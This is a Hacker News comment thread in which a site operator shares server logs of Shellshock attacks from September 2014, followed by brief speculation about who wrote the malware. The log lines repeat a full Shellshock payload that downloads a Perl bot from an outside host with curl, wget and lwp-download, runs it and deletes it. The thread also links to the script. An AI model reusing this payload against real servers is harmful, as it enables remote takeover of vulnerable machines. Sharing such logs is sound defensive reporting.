Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I've also seen some in the wild, and I'm behind CloudFlare. CloudFlare have stopped the attacks reaching us now, but a few got through on the 29th September (this is a Pro account). I'm not sure precisely when the CloudFlare protection started, but all servers involved were patched as soon as the patches were available (before the first attacks reached my servers).

The log file entries:

    200.91.29.35 - - [29/Sep/2014:17:18:44 +0000] "GET /conversations/626/&sa=U&ei=IoYpVKPNNMPmsASpzoLwAg&ved=0CJoBEBYwFzi8BQ&usg=AFQjCNHTmJMWiGvhfCfRFEM_vtu6-SSafQ//cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET /conversations/626/%26amp%3Bsa%3DU%26amp%3Bei%3DIoYpVKPNNMPmsASpzoLwAg%26amp%3Bved%3D0CJoBEBYwFzi8BQ%26amp%3Busg%3DAFQjCNHTmJMWiGvhfCfRFEM_vtu6-SSafQ//cgi-bin/env.pl/ HTTP/1.1" 404 10779 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET //cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:46 +0000] "GET /cgi-bin/env.pl/ HTTP/1.1" 404 10637 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:46 +0000] "GET /conversations/626//cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
    200.91.29.35 - - [29/Sep/2014:17:18:47 +0000] "GET /conversations/626//cgi-bin/env.pl/ HTTP/1.1" 404 10656 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;"
The pastebin of the PERL script at the other end: http://pastebin.ca/2850408


It's interesting to note that some code has been wrote from Portuguese/Brasilian devs and other parts from an Italian one, which leads to speculation that it was not a one band man but instead a group.


I figured it was just the work of script kiddies. The exploit is such an easy thing to do that people are just cobbling together scripts and having a go.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: